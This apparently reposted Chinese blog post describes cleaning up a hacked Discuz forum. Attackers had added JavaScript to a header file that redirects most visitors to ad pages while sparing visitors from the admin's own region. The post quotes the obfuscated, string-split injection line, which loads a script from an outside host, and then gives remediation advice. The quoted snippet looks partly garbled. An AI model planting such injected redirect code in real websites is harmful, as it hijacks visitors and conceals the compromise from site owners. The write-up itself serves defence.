你是否遇到過你的網站開啟一會就自動跳轉到其他頁面,而且這個問題是你的使用者告訴你的,而你自己卻沒有遇到?
網站被掛馬,非管理員訪問自動跳轉到廣告頁面 怎麼解決
discuz掛馬彈出頁面
經過蔥子我細心的對掛馬網站做排查,終於讓我找到了問題所在。
掛馬者是透過在discuz的頭部js檔案裡面新增了劫持js程式碼,透過判斷訪問者的IP來實現不同跳轉的。
具體程式碼如下:
document.write("<163"+"cript src='http://141"+"d.172"+"om"+"1263"+".n"+"et/i"+"p.asp?l"+"oc=chengdu'></s"+"cript>");
可以看出,後面有個“chengdu”程式碼,這段程式碼的意思就是IP為成都地區的訪問者在訪問被掛馬頁面時不做跳轉。其餘地區的IP訪問者則跳轉。
從這段程式碼我們就可以看出掛馬者是多麼的用心險惡。
他首先根據你網站所在地進行判斷網站管理員經常使用的IP地址所在地,然後有針對性的對網站管理員不做跳轉劫持。
所以,這種劫持的情況下,網站管理者非常難以發現到網站被掛馬了。
解決辦法也比較簡單:
首先校驗下原始檔案,對比下哪些js檔案近期有被改動過,然後針對被改動過的js檔案做以上程式碼段的排除。找到以上程式碼段後,刪除即可。
最後說一下,各位網站管理者一定要注意保管好網站和伺服器的管理密碼,儘量設定的複雜一點。同時也要及時檢測伺服器是否存在漏洞等,及時做針對性處理,以避免類似的事情再發生。
本文由甲爪cpa聯盟整理編輯!原文連結www.jiazhua.com 轉載請註明!